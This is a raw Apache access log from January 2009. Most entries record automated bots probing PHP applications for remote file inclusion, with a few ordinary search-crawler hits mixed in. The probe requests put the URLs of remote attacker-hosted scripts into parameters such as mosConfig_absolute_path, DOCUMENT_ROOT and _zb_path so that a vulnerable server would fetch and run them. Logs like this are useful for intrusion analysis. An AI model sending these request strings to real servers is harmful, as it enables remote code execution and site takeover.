208.115.117.37 - - [03/Jan/2009:00:57:27 +0000] "GET /log/administrator/components/com_madeira/photoupload.phphttp://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 431 "-" "libwww-perl/5.822" 216 670
89.36.39.203 - - [03/Jan/2009:01:02:20 +0000] "GET /?board=free&act=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 200 16348 "-" "libwww-perl/5.803" 184 16665
218.149.85.37 - - [03/Jan/2009:01:02:23 +0000] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 354 "-" "libwww-perl/5.79" 170 593
89.36.39.203 - - [03/Jan/2009:01:22:49 +0000] "GET /log/web.log.3/?board=free&act=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 351 "-" "libwww-perl/5.803" 198 590
89.36.39.203 - - [03/Jan/2009:01:22:49 +0000] "GET /?board=free&act=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 200 16348 "-" "libwww-perl/5.803" 184 16665
89.36.39.203 - - [03/Jan/2009:01:22:49 +0000] "GET /log/?board=free&act=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 200 3174 "-" "libwww-perl/5.803" 188 3401
218.149.85.37 - - [03/Jan/2009:01:27:17 +0000] "GET /log/web.log.4//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 369 "-" "libwww-perl/5.79" 184 608
218.149.85.37 - - [03/Jan/2009:01:27:17 +0000] "GET /log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 359 "-" "libwww-perl/5.79" 174 598
74.55.30.2 - - [03/Jan/2009:01:28:28 +0000] "GET /log/web.log.4//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 398 "-" "libwww-perl/5.810" 235 637
74.55.30.2 - - [03/Jan/2009:01:28:28 +0000] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.810" 221 622
74.55.30.2 - - [03/Jan/2009:01:28:28 +0000] "GET /log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.810" 225 627
66.249.72.141 - - [03/Jan/2009:01:30:08 +0000] "GET /WiltonPark2008WebEntry.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 304 250
74.55.30.2 - - [03/Jan/2009:01:32:51 +0000] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.810" 221 622
74.55.30.2 - - [03/Jan/2009:01:33:49 +0000] "GET /log/web.log.4//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 398 "-" "libwww-perl/5.810" 235 637
74.55.30.2 - - [03/Jan/2009:01:33:50 +0000] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.810" 221 622
74.55.30.2 - - [03/Jan/2009:01:33:50 +0000] "GET /log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.810" 225 627
89.36.39.203 - - [03/Jan/2009:01:41:35 +0000] "GET /log/web.log/?board=free&act=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 349 "-" "libwww-perl/5.803" 196 588
98.121.103.161 - - [03/Jan/2009:01:42:48 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 207 624
98.121.103.161 - - [03/Jan/2009:01:42:48 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 193 610
98.121.103.161 - - [03/Jan/2009:01:42:48 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 197 614
98.121.103.161 - - [03/Jan/2009:01:44:34 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 207 624
203.34.37.16 - - [03/Jan/2009:01:44:59 +0000] "GET /log/web.log.4//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 398 "-" "libwww-perl/5.79" 206 637
203.34.37.16 - - [03/Jan/2009:01:45:01 +0000] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.79" 192 622
203.34.37.16 - - [03/Jan/2009:01:45:01 +0000] "GET /log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.79" 196 627
200.40.34.42 - - [03/Jan/2009:01:45:16 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 193 610
200.40.34.42 - - [03/Jan/2009:01:45:16 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 210 625
200.40.34.42 - - [03/Jan/2009:01:45:17 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 197 614
201.52.32.115 - - [03/Jan/2009:01:48:11 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.808" 225 614
201.52.32.115 - - [03/Jan/2009:01:48:11 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.808" 221 610
201.52.32.115 - - [03/Jan/2009:01:48:11 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.808" 235 624
200.40.34.42 - - [03/Jan/2009:01:49:31 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 207 624
212.116.224.229 - - [03/Jan/2009:01:49:45 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.808" 207 624
212.116.224.229 - - [03/Jan/2009:01:49:45 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.808" 193 610
212.116.224.229 - - [03/Jan/2009:01:49:45 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.808" 197 614
201.52.32.115 - - [03/Jan/2009:01:50:06 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.808" 235 624
212.116.224.229 - - [03/Jan/2009:01:52:15 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.808" 207 624
98.121.103.161 - - [03/Jan/2009:01:54:18 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 210 625
85.25.124.175 - - [03/Jan/2009:01:54:21 +0000] "GET /errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 347 "-" "libwww-perl/5.806" 200 586
201.52.32.115 - - [03/Jan/2009:01:56:42 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.808" 238 625
200.40.34.42 - - [03/Jan/2009:01:56:49 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 207 624
212.116.224.229 - - [03/Jan/2009:01:58:00 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.808" 210 625
91.142.214.201 - - [03/Jan/2009:01:59:50 +0000] "GET /log/web.log.4/!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805" 186 641
91.142.214.201 - - [03/Jan/2009:01:59:50 +0000] "GET /!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805" 172 627
91.142.214.201 - - [03/Jan/2009:01:59:50 +0000] "GET /log/!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 392 "-" "libwww-perl/5.805" 176 631
91.142.214.201 - - [03/Jan/2009:01:59:50 +0000] "GET /log/web.log.4/!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805" 186 641
91.142.214.201 - - [03/Jan/2009:01:59:50 +0000] "GET /!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805" 172 627
91.142.214.201 - - [03/Jan/2009:01:59:50 +0000] "GET /log/!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 392 "-" "libwww-perl/5.805" 176 631
91.142.214.201 - - [03/Jan/2009:02:01:32 +0000] "GET /log/web.log.1/!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805" 186 641
91.142.214.201 - - [03/Jan/2009:02:01:32 +0000] "GET /log/web.log.1/!scanhttp://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805" 186 641
91.142.214.201 - - [03/Jan/2009:02:01:37 +0000] "GET /log/web.log.4//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 405 "-" "libwww-perl/5.805" 257 644
91.142.214.201 - - [03/Jan/2009:02:01:37 +0000] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 395 "-" "libwww-perl/5.805" 247 634
91.142.214.201 - - [03/Jan/2009:02:01:37 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 390 "-" "libwww-perl/5.805" 243 629
91.142.214.201 - - [03/Jan/2009:02:01:39 +0000] "GET /log/web.log.4//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 405 "-" "libwww-perl/5.805" 257 644
91.142.214.201 - - [03/Jan/2009:02:01:39 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 390 "-" "libwww-perl/5.805" 243 629
91.142.214.201 - - [03/Jan/2009:02:01:39 +0000] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 395 "-" "libwww-perl/5.805" 247 634
91.142.214.201 - - [03/Jan/2009:02:02:07 +0000] "GET /log/web.log.1//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 405 "-" "libwww-perl/5.805" 257 644
91.142.214.201 - - [03/Jan/2009:02:02:48 +0000] "GET /log/web.log.1//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 405 "-" "libwww-perl/5.805" 257 644
62.109.89.253 - - [03/Jan/2009:02:03:25 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 390 "-" "libwww-perl/5.803" 215 629
62.109.89.253 - - [03/Jan/2009:02:03:25 +0000] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 395 "-" "libwww-perl/5.803" 219 634
62.109.89.253 - - [03/Jan/2009:02:03:25 +0000] "GET /log/web.log.4//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 405 "-" "libwww-perl/5.803" 229 644
71.56.182.207 - - [03/Jan/2009:02:10:22 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.808" 197 614
71.56.182.207 - - [03/Jan/2009:02:10:27 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.808" 193 610
71.56.182.207 - - [03/Jan/2009:02:10:33 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.808" 207 624
85.25.124.175 - - [03/Jan/2009:02:12:20 +0000] "GET /log/web.log.3/errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 361 "-" "libwww-perl/5.806" 214 600
85.25.124.175 - - [03/Jan/2009:02:12:21 +0000] "GET /errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 347 "-" "libwww-perl/5.806" 200 586
85.25.124.175 - - [03/Jan/2009:02:12:21 +0000] "GET /log/errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 351 "-" "libwww-perl/5.806" 204 590
71.56.182.207 - - [03/Jan/2009:02:12:51 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.808" 207 624
66.249.72.141 - - [03/Jan/2009:02:20:14 +0000] "GET /2008Lockeparkentryformweb.pdf HTTP/1.1" 200 779296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 257 779659
85.25.124.175 - - [03/Jan/2009:02:24:20 +0000] "GET /log/web.log/errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 359 "-" "libwww-perl/5.806" 212 598
203.34.37.16 - - [03/Jan/2009:02:40:20 +0000] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.79" 192 622
81.176.232.101 - - [03/Jan/2009:02:51:53 +0000] "GET /?board=free&act=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 200 16348 "-" "libwww-perl/5.810" 199 16665
203.34.37.16 - - [03/Jan/2009:02:56:47 +0000] "GET /log/web.log.4//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 398 "-" "libwww-perl/5.79" 206 637
203.34.37.16 - - [03/Jan/2009:02:56:48 +0000] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.79" 192 622
203.34.37.16 - - [03/Jan/2009:02:56:49 +0000] "GET /log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.79" 196 627
72.30.65.54 - - [03/Jan/2009:03:05:01 +0000] "GET /Gallery.htm HTTP/1.0" 200 8051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 227 8367
66.249.72.141 - - [03/Jan/2009:03:07:18 +0000] "GET /2007Lockeparkentryformweb.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 307 251
81.176.232.101 - - [03/Jan/2009:03:10:50 +0000] "GET /log/web.log.3/?board=free&act=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 351 "-" "libwww-perl/5.810" 213 590
81.176.232.101 - - [03/Jan/2009:03:10:50 +0000] "GET /?board=free&act=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 200 16348 "-" "libwww-perl/5.810" 199 16665
81.176.232.101 - - [03/Jan/2009:03:10:50 +0000] "GET /log/?board=free&act=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 200 3174 "-" "libwww-perl/5.810" 203 3401
211.202.2.220 - - [03/Jan/2009:03:13:47 +0000] "GET /log/web.log.3///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 357 "-" "libwww-perl/5.79" 170 596
211.202.2.220 - - [03/Jan/2009:03:13:47 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.79" 160 3410
211.202.2.220 - - [03/Jan/2009:03:13:47 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.79" 156 16665
211.202.2.220 - - [03/Jan/2009:03:14:16 +0000] "GET /log/web.log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 355 "-" "libwww-perl/5.79" 168 594
211.202.2.220 - - [03/Jan/2009:03:14:16 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.79" 160 3410
211.202.2.220 - - [03/Jan/2009:03:14:16 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.79" 156 16665
222.121.123.91 - - [03/Jan/2009:03:15:10 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.803" 189 3410
222.121.123.91 - - [03/Jan/2009:03:15:10 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.803" 185 16665
222.121.123.91 - - [03/Jan/2009:03:15:15 +0000] "GET /log/web.log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 355 "-" "libwww-perl/5.803" 197 594
211.202.2.220 - - [03/Jan/2009:03:15:47 +0000] "GET /log/web.log.3///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 357 "-" "libwww-perl/5.79" 170 596
222.121.123.91 - - [03/Jan/2009:03:18:33 +0000] "GET /log/web.log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 355 "-" "libwww-perl/5.803" 197 594
222.121.123.91 - - [03/Jan/2009:03:18:34 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.803" 185 16665
222.121.123.91 - - [03/Jan/2009:03:18:43 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.803" 189 3410
222.121.123.91 - - [03/Jan/2009:03:20:25 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.803" 189 3410
222.121.123.91 - - [03/Jan/2009:03:20:24 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.803" 185 16665
222.121.123.91 - - [03/Jan/2009:03:20:52 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.803" 189 3410
222.121.123.91 - - [03/Jan/2009:03:20:52 +0000] "GET /log/web.log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 355 "-" "libwww-perl/5.803" 197 594
222.121.123.91 - - [03/Jan/2009:03:20:52 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.803" 185 16665
222.121.123.91 - - [03/Jan/2009:03:21:27 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.803" 189 3410
211.202.2.220 - - [03/Jan/2009:03:22:41 +0000] "GET /log///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 3183 "-" "libwww-perl/5.79" 160 3410
211.202.2.220 - - [03/Jan/2009:03:22:41 +0000] "GET /log/web.log.3///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 357 "-" "libwww-perl/5.79" 170 596
211.202.2.220 - - [03/Jan/2009:03:22:41 +0000] "GET ///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 200 16348 "-" "libwww-perl/5.79" 156 16665
222.121.123.91 - - [03/Jan/2009:03:25:07 +0000] "GET /log/web.log.3///////?_zb_path=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 357 "-" "libwww-perl/5.803" 199 596
81.176.232.101 - - [03/Jan/2009:03:26:05 +0000] "GET /log/web.log/?board=free&act=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 349 "-" "libwww-perl/5.810" 211 588
72.30.65.54 - - [03/Jan/2009:03:30:17 +0000] "GET /Gallery2.htm HTTP/1.0" 200 7390 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 228 7706
66.249.72.141 - - [03/Jan/2009:03:33:07 +0000] "GET /HomeButton.swf HTTP/1.1" 200 1213 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 242 1586
128.121.79.26 - - [03/Jan/2009:03:43:27 +0000] "GET /log/web.log.4/head.php?adresa=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 359 "-" "libwww-perl/5.65" 161 598
128.121.79.26 - - [03/Jan/2009:03:43:28 +0000] "GET /head.php?adresa=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 345 "-" "libwww-perl/5.65" 147 584
128.121.79.26 - - [03/Jan/2009:03:43:28 +0000] "GET /log/head.php?adresa=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 349 "-" "libwww-perl/5.65" 151 588
218.149.85.37 - - [03/Jan/2009:03:44:27 +0000] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 354 "-" "libwww-perl/5.79" 170 593
218.149.85.37 - - [03/Jan/2009:04:08:46 +0000] "GET /log/web.log.4//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 369 "-" "libwww-perl/5.79" 184 608
218.149.85.37 - - [03/Jan/2009:04:08:47 +0000] "GET /log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 359 "-" "libwww-perl/5.79" 174 598
203.34.37.16 - - [03/Jan/2009:04:09:46 +0000] "GET /log/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 351 "-" "libwww-perl/5.79" 141 590
203.34.37.16 - - [03/Jan/2009:04:09:47 +0000] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 137 586
88.84.128.40 - - [03/Jan/2009:04:15:56 +0000] "GET /log/errors.php?error=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 351 "-" "Mozilla/5.0" 180 590
88.84.128.40 - - [03/Jan/2009:04:15:56 +0000] "GET /log/web.log.4%20%20/errors.php?error=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 363 "-" "Mozilla/5.0" 196 602
88.84.128.40 - - [03/Jan/2009:04:15:57 +0000] "GET /errors.php?error=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 347 "-" "Mozilla/5.0" 176 586
89.36.39.203 - - [03/Jan/2009:04:16:30 +0000] "GET //twindow_notice.php?shop_this_skin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 355 "-" "libwww-perl/5.803" 223 594
148.245.102.115 - - [03/Jan/2009:04:24:37 +0000] "GET /log/web.log.4//add.php?APB_rp=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 304 598
148.245.102.115 - - [03/Jan/2009:04:24:37 +0000] "GET //add.php?APB_rp=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 290 583
148.245.102.115 - - [03/Jan/2009:04:24:37 +0000] "GET /log//add.php?APB_rp=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 294 588
208.80.194.45 - - [03/Jan/2009:04:26:15 +0000] "GET / HTTP/1.0" 200 16348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {44FBB9B2-8F30-4F8E-7159-9413B4759B0C}; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )" 202 16665
89.36.39.203 - - [03/Jan/2009:04:31:52 +0000] "GET /log/web.log.3//twindow_notice.php?shop_this_skin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 370 "-" "libwww-perl/5.803" 237 609
89.36.39.203 - - [03/Jan/2009:04:31:55 +0000] "GET //twindow_notice.php?shop_this_skin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 355 "-" "libwww-perl/5.803" 223 594
89.36.39.203 - - [03/Jan/2009:04:31:57 +0000] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 360 "-" "libwww-perl/5.803" 227 599
89.36.39.203 - - [03/Jan/2009:04:48:07 +0000] "GET /log/web.log.5//twindow_notice.php?shop_this_skin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 370 "-" "libwww-perl/5.803" 237 609
62.109.89.253 - - [03/Jan/2009:04:54:56 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 385 "-" "libwww-perl/5.803" 209 624
62.109.89.253 - - [03/Jan/2009:04:56:18 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 385 "-" "libwww-perl/5.803" 209 624
